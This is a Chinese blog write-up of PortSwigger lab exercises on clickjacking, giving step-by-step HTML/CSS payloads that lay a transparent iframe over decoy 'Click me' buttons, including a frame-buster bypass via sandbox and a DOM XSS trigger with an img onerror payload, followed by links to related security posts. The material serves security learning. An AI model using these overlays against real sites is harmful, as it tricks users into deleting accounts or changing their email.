burpsuit 靶场(Clickjacking)

最新推荐文章于 2024-08-21 13:48:49 发布
最新推荐文章于 2024-08-21 13:48:49 发布
阅读量234 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63303407/article/details/128618270
版权

具有 CSRF 令牌保护的基本点击劫持

image-20221204112349097

这里存在一个删除账号的按钮 其中使用csrf进行了保护 这里需要我们去伪造页面欺骗用户点击这个删除按钮

image-20221204114809697

我们先来看一下官方的payload

<style>
    iframe {
        position:relative;
        width:$width_value;
        height: $height_value;
        opacity: $opacity;
        z-index: 2;
    }
    div {
        position:absolute;
        top:$top_value;
        left:$side_value;
        z-index: 1;
    }
</style>
<div>Test me</div>
<iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>

其中这里先包含了一个 iframe标签

<iframe src="https://0acd002304e24941c0a316e7009900d2.web-security-academy.net/my-account"></iframe>

如果没登录的话可以先登录一下

image-20221204115802889

现在我们需要调整一下样式使他变得好看点

<style>
    iframe{
        position:relative;
    /*    自适应高度*/
        width: 700px;
        height: 800px;
        opacity: 0.1;
    /*    表示元素的透明度*/
        z-index: 2;
    /*    当被某些元素挡住时显示的顺序*/
    }
</style>
<iframe src="https://0a18001503733d79c1f925e000e5006c.web-security-academy.net/my-account"></iframe>

image-20221204123008259

变成了这样 我们还需要一个点击字样

image-20221204123033596

<style>
    iframe{
        position:relative;
    /*    自适应高度*/
        width: 700px;
        height: 800px;
        opacity: 0.1;
    /*    表示元素的透明度*/
        z-index: 2;
    /*    当被某些元素挡住时显示的顺序*/
    }
</style>
<div>Test me</div>
<iframe src="https://0a18001503733d79c1f925e000e5006c.web-security-academy.net/my-account"></iframe>

image-20221204123133050

调整一下位置

image-20221204124350609

<style>
    iframe{
        position:relative;
    /*    相对定位*/
        width: 1000px;
        height: 700px;
        opacity: 0.1;
    /*    表示元素的透明度*/
        z-index: 2;
    /*    当被某些元素挡住时显示的顺序*/
    }
    div{
        position: absolute;
    /*    绝对定位*/
        top:520px;
        left: 80px;
        z-index: 1 ;
    }
</style>
<div>Test me</div>
<iframe src="https://0a18001503733d79c1f925e000e5006c.web-security-academy.net/my-account"></iframe>

接着需要修改一下透明度 还需要吧Test me改成Click me

image-20221204124511279

<style>
    iframe{
        position:relative;
    /*    相对定位*/
        width: 1000px;
        height: 700px;
        opacity: 0.00000001;
    /*    表示元素的透明度*/
        z-index: 2;
    /*    当被某些元素挡住时显示的顺序*/
    }
    div{
        position: absolute;
    /*    绝对定位*/
        top:520px;
        left: 80px;
        z-index: 1 ;
    }
</style>
<div>Click me</div>
<iframe src="https://0a18001503733d79c1f925e000e5006c.web-security-academy.net/my-account"></iframe>

image-20221204124822466

使用从 URL 参数预填充的表单输入数据进行点击劫持

image-20221204124853871

这里当我们登录之后 如果直接带email参数访问 会自动填充进去

image-20221204125601472

<style>
    iframe{
        position: relative;
        width: 400px;
        height: 600px;
        opacity: 0.000001;
        z-index: 2;
    }
    div{
        position: absolute;
        top:505px;
      left:100px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0a35002c043e60f9c04d46c9006400af.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>

image-20221204130931161

使用 frame buster 脚本进行点击劫持

image-20221204135412340

这里的 farme buster 大致意思就是只接受自己是最顶层网页 但是当iframe指定 sandbox 为allow-forms或者 allow-scripts,并且忽略 allow-top-ngvigation会使iframe中的网页不知道自己是否是最顶层网页

<style>
    iframe{
        position: relative;
        width: 1000px;
        height: 700px;
        opacity: 0.1;
        z-index: 2;
    }
    div{
        position: absolute;
        top:475px;
      left:98px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe sandbox="allow-forms" src="https://0a35002c043e60f9c04d46c9006400af.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>

image-20221204144436494

利用点击劫持漏洞触发基于 DOM 的 XSS

image-20221204144734283

image-20221204162738301

这个靶场也可以预填充

<style>
    iframe{
        position: relative;
        width: 2000px;
        height: 1500px;
        opacity: 0.000001;
        z-index: 2;
    }
    div{
        position: absolute;
        top: 830px;
        left: 460px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0af90067041c65cfc02a030a00a8007f.web-security-academy.net/feedback?name=%3Cimg%20src=1%20οnerrοr=print()%3E&email=hacker@attacker-website.com&subject=test&message=test"></iframe>

image-20221204164022028

多步点击劫持

image-20221204164053818

这里是让我们点击两次 执行劫持命令

image-20221204170249611

image-20221204170242543

<style>
    iframe{
        position:relative;
        width: 2000px;
        height: 1000px;
        opacity: 0.1;
        z-index: 2;
    }
    .firstClick,.secondClick{
        position: absolute;
        top: 540px;
        left: 442px;
        z-index: 1;

    }
    .secondClick{
        top: 340px;
        left: 580px;
    }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me second</div>
<iframe src="https://0a0a001703e0d66fc07443c70068004e.web-security-academy.net/my-account"></iframe>

image-20221204170739282

wanan0red
关注
Web安全之点击劫持(ClickJacking
墨痕诉清风的博客
03-14 710
目录 iframe覆盖 直接示例说明 解决办法 Apache配置: nginx配置: IIS配置: 图片覆盖 示例 解决办法 总结 点击劫持(ClickJacking)是一种视觉上的欺骗手段。大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面;二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义; iframe覆盖 直接示例说明 1. 假如我们在百度有个贴吧,想偷偷让
带你刷burpsuite官方网络安全学院靶场(练兵场)之客户端漏洞——跨站请求伪造(CSRF)专题
HBohan的博客
08-05 1869
介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以梨子这个初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 什么是CSRF? CSRF全称为cross-site request forgery,译为跨站请求伪造。有的站点会采用同源策略,如果想要利用受害者身份去执
JWT攻击详解 --Burp suit官方靶场
m0_60742333的博客
03-23 2408
JWT详解:JSON 网络令牌 (JWT) 是一种标准化格式,用于在系统之间发送加密签名的 JSON 数据。它们理论上可以包含任何类型的数据,但最常用于发送有关用户的信息(“声明”),作为身份验证、会话处理和访问控制机制的一部分。
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
dzqxwzoe的博客
08-21 1062
渗透测试(Penetrationtest)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透。Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。
burp靶场--CSRF
qq_33168924的博客
01-25 2082
应用程序不校验csrf的有效性,只是对比body中与cookie中csrf的值是否相同,相同就接受请求,由于搜索功能没有csrf保护,并且存在cookie注入,所以可以使用搜索中cookie注入修改cookie的csrf与bodycsrf一致造成csrf攻击。步骤1:登陆两个账户,将账户A的csrfkey与csrf值替换给第二个账户B中使用,用来请求修改邮箱地址,修改成功,但是由于cookie被修改会导致账户退出,并且发现搜索功能存在cookie注入【注入的数据可以修改客户端cookie设置】,所以结合。
burpsuit 靶场(Cross-site request forgery)
wanan的博客
01-09 413
burpsuit 靶场(Cross-site request forgery)
burp靶场--跨域资源共享(CORS)
qq_33168924的博客
01-24 1676
2、完成实验:编制JavaScript来定位本地网络(192.168.0.0/24,端口8080)上的端点,然后使用该端点来识别和创建基于CORS的攻击以删除用户。删除用户carlos。【父域允许子域CORS敏感信息,资源存在xss漏洞,从子域发出xss请求父域敏感信息,并将敏感信息发送到hacker控制的服务器上】1、此网站具有不安全的CORS配置,因为它信任所有内部网络来源。发现内部主机:192.168.0.230:8080。
Clickjacking Test-crx插件
04-02
语言:English Offcon Info Security的点击劫持测试 此chrome扩展程序将检查是否可以对当前网页进行格式化,甚至生成用于安全报告的概念证明HTML。
“点击劫持”测试「Clickjacking Test」-crx插件
03-09
通过Offcon Info Security进行的Clickjacking测试。 此chrome扩展程序将检查是否可以对当前网页进行格式化,甚至生成用于安全报告的概念证明HTML。 支持语言:English
no-clickjacking
05-16
Google Chrome扩展程序v1.1: Firefox扩展v1.1: Safari Extension v1.1: 变更记录 2013-11-19 更新了不透明度检查,将所有小于0.1的不透明度视为已隐藏。 某些站点已使用负值(-1)或非零值(0.01)以避免被发现...
web安全ClickJacking
10-31
### ClickJacking(点击劫持) #### 概述 点击劫持(ClickJacking),也被称为UI重叠攻击,是一种常见的Web安全攻击手段。它通过使用多层透明或不透明的网页元素来诱导用户在不知情的情况下点击目标网站上的特定...
burp靶场--ssrf
qq_33168924的博客
01-17 1955
服务器端请求伪造是一种 Web 安全漏洞,允许攻击者导致服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能能够强制服务器连接到任意外部系统。这可能会泄露敏感数据,例如授权凭据,或者代码执行。
Burpsuite靶场】XSS
2302_79800344的博客
04-23 1430
基于Burpsuite靶场,深度学习XSS三种类型的各类情况。
burpsuit 靶场(Cross-site scripting)
wanan的博客
01-22 1932
burpsuit 靶场(Cross-site scripting)
burp靶场--XXE注入
qq_33168924的博客
01-16 1316
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。在某些情况下,攻击者可以利用 XXE 漏洞执行服务器端请求伪造(SSRF) 攻击,升级 XXE 攻击以危害底层服务器或其他后端基础设施。
burpsuit 靶场(Authentication)
wanan的博客
01-09 302
burpsuit 靶场(Authentication)
burp靶场-path traversal
qq_33168924的博客
01-15 571
修改filename值:filename=…/etc/passwd。修改GET url:/image?读取:/etc/passwd。
burpsuit 靶场( HTTP request smuggling)
wanan的博客
01-22 2200
burpsuit 靶场( HTTP request smuggling)
Burp Suite靶场练习——暴力破解(pikache靶场
p36273的博客
06-05 6584
靶场一共有4关,现我们就开始通关吧。Token 是在服务端产生的。如果前端使用用户名/密码向服务端请求认证,服务端认证成功,那么在服务端会返回 Token 给前端。前端可以在每次请求的时候带上 Token 证明自己的合法地位。如果这个 Token 在服务端持久化(比如存入数据库),那它就是一个永久的身份令牌。Token 完全由应用管理,所以它可以避开同源策略Token 可以避免 CSRF 攻击Token 可以是无状态的,可以在多个服务间共享BurpSuite爆破的几种模式攻击模式。
Clickjacking: CSP frame-ancestors missing
最新发布
09-11
Clickjacking(点击劫持)是一种安全漏洞攻击手段,攻击者通过在看似无害的网页中嵌入恶意的透明层,诱使用户在不知情的情况下点击隐藏的按钮或链接,从而实现恶意操作。这种情况下的点击操作对于用户来说是“看不见”的,因为它们被设计为透明层上的按钮或链接所覆盖。 为防止Clickjacking攻击,可以使用内容安全策略(Content Security Policy,CSP)中的frame-ancestors指令。CSP frame-ancestors指令可以指定哪些外部域可以嵌入当前页面,从而阻止不信任的站点进行嵌入。如果CSP header中缺少frame-ancestors指令,那么该页面就容易受到Clickjacking攻击。 使用CSP frame-ancestors指令的正确方法是在服务器发送的HTTP响应头中包含如下指令: ```http Content-Security-Policy: frame-ancestors 'none'; ``` 或者指定特定的允许列表: ```http Content-Security-Policy: frame-ancestors 'self' example.com; ``` 这样,只有在指令中明确允许的域可以将页面嵌入到iframe中,从而有效减少遭受Clickjacking攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值